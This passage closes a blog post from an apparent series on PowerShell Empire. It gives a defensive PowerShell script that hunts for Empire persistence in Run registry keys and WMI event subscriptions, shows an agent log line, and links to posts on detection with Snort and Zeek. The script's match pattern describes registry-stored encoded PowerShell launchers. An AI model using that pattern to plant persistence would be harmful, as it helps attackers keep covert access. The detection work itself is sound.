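    (Get-ItemProperty $RunKey).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and
                       ($_.Name -eq $SubName -or "$($_.Value)" -match 'powershell.*(HKLM|\bgp\b|-enc)') } |
        ForEach-Object { Add-Finding 'RunKey' $_.Name $RunKey "$($_.Value)" }
}

# 3. WMI: permanent event subscriptions live in root\subscription. List every
#    filter and command-line consumer; a Name equal to $SubName is the module
#    default, but anything here deserves review on a workstation.
Get-CimInstance -Namespace root\subscription -ClassName __EventFilter |
    ForEach-Object { Add-Finding 'WmiFilter' $_.Name $_.EventNamespace $_.Query }
Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer |
    ForEach-Object { Add-Finding 'WmiConsumer' $_.Name $_.ExecutablePath $_.CommandLineTemplate }

$findings | Sort-Object Kind, Name | Format-Table -AutoSize -Wrap
```

Run it from an elevated PowerShell, since reading HKLM payload values and the root\subscription namespace fully requires administrative rights.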


10. That's it.

2021-11-21 19:14:07 : 
[!] Agent 73H864SX exiting: past killdate

There is so much more that can be learned here. However, this is enough for me at this point. I believe I have achieved my objective.

Other posts in this series:

Beginning Powershell Empire - The Attack in 10 steps
Powershell Empire Log Analysis
Powershell Empire Packet Analysis
Powershell Empire Detection with Snort
Powershell Empire - Detection with Zeek

